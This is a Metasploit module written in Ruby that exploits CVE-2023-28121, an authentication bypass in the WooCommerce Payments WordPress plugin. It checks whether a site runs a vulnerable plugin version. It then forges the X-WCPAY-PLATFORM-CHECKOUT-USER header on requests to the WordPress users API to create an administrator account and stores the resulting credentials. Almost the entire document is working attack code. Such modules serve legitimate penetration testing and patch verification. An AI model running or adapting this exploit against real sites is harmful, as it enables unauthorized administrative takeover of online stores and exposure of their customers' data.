Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HTTP::Wordpress
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin WooCommerce Payments Unauthenticated Admin Creation',
        'Description' => %q{
          WooCommerce-Payments plugin for Wordpress versions 4.8', '4.8.2, 4.9', '4.9.1,
          5.0', '5.0.4, 5.1', '5.1.3, 5.2', '5.2.2, 5.3', '5.3.1, 5.4', '5.4.1,
          5.5', '5.5.2, and 5.6', '5.6.2 contain an authentication bypass by specifying a valid user ID number
          within the X-WCPAY-PLATFORM-CHECKOUT-USER header. With this authentication bypass, a user can then use the API
          to create a new user with administrative privileges on the target WordPress site IF the user ID
          selected corresponds to an administrator account.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Michael Mazzolini', # original discovery
          'Julien Ahrens' # detailed writeup
        ],
        'References' => [
          ['URL', 'https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/'],
          ['URL', 'https://developer.woocommerce.com/2023/03/23/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know/'],
          ['CVE', '2023-28121']
        ],
        'DisclosureDate' => '2023-03-22',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )
    register_options(
      [
        Opt::RPORT(80),
        OptString.new('USERNAME', [true, 'User to create', '']),
        OptString.new('PASSWORD', [false, 'Password to create, random if blank', '']),
        OptString.new('EMAIL', [false, 'Email to create, random if blank', '']),
        OptInt.new('ADMINID', [false, 'ID Number of a WordPress administrative user', 1]),
        OptString.new('TARGETURI', [true, 'The URI of the Wordpress instance', '/'])
      ]
    )
  end

  def check
    unless wordpress_and_online?
      return Msf::Exploit::CheckCode::Safe('Server not online or not detected as wordpress')
    end

    vuln_versions = [
      ['4.8', '4.8.2'],
      ['4.9', '4.9.1'],
      ['5.0', '5.0.4'],
      ['5.1', '5.1.3'],
      ['5.2', '5.2.2'],
      ['5.3', '5.3.1'],
      ['5.4', '5.4.1'],
      ['5.5', '5.5.2'],
      ['5.6', '5.6.2']
    ]

    vuln_versions.each do |versions|
      introduced = versions[0]
      fixed = versions[1]
      checkcode = check_plugin_version_from_readme('woocommerce-payments', fixed, introduced)
      if checkcode == Exploit::CheckCode::Appears
        return Msf::Exploit::CheckCode::Appears('WooCommerce-Payments version is exploitable')
      end
    end

    Msf::Exploit::CheckCode::Safe('WooCommerce-Payments version not vulnerable or plugin not installed')
  end

  def run
    password = datastore['PASSWORD']
    if datastore['PASSWORD'].blank?
      password = Rex::Text.rand_text_alphanumeric(10..15)
    end

    email = datastore['EMAIL']
    if datastore['EMAIL'].blank?
      email = Rex::Text.rand_mail_address
    end

    username = datastore['USERNAME']
    if datastore['USERNAME'].blank?
      username = Rex::Text.rand_text_alphanumeric(5..20)
    end

    print_status("Attempting to create an administrator user -> #{username}:#{password} (#{email})")
    ['/', 'index.php', '/rest'].each do |url_root| # try through both '' and 'index.php' since API can be in 2 diff places based on install/rewrites
      if url_root == '/rest'
        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path),
          'headers' => { "X-WCPAY-PLATFORM-CHECKOUT-USER": datastore['ADMINID'] },
          'method' => 'POST',
          'ctype' => 'application/json',
          'vars_get' => { 'rest_route' => 'wp-json/wp/v2/users' },
          'data' => {
            'username' => username,
            'email' => email,
            'password' => password,
            'roles' => ['administrator']
          }.to_json
        })
      else
        res = send_request_cgi({
          'uri' => normalize_uri(target_uri.path, url_root, 'wp-json', 'wp', 'v2', 'users'),
          'headers' => { "X-WCPAY-PLATFORM-CHECKOUT-USER": datastore['ADMINID'] },
          'method' => 'POST',
          'ctype' => 'application/json',
          'data' => {
            'username' => username,
            'email' => email,
            'password' => password,
            'roles' => ['administrator']
          }.to_json
        })
      end
      fail_with(Failure::Unreachable, 'Connection failed') unless res
      next if res.code == 404

      if res.code == 201 && res.body&.match(/"email":"#{email}"/) && res.body&.match(/"username":"#{username}"/)
        print_good('User was created successfully')
        if framework.db.active
          create_credential_and_login({
            address: rhost,
            port: rport,
            protocol: 'tcp',
            workspace_id: myworkspace_id,
            origin_type: :service,
            service_name: 'WordPress',
            username: username,
            private_type: :password,
            private_data: password,
            module_fullname: fullname,
            access_level: 'administrator',
            last_attempted_at: DateTime.now,
            status: Metasploit::Model::Login::Status::SUCCESSFUL
          })
        end
      else
        print_error("Server response: #{res.body}")
      end
      break # we didn't get a 404 so we can bail on the 2nd attempt
    end
  end
end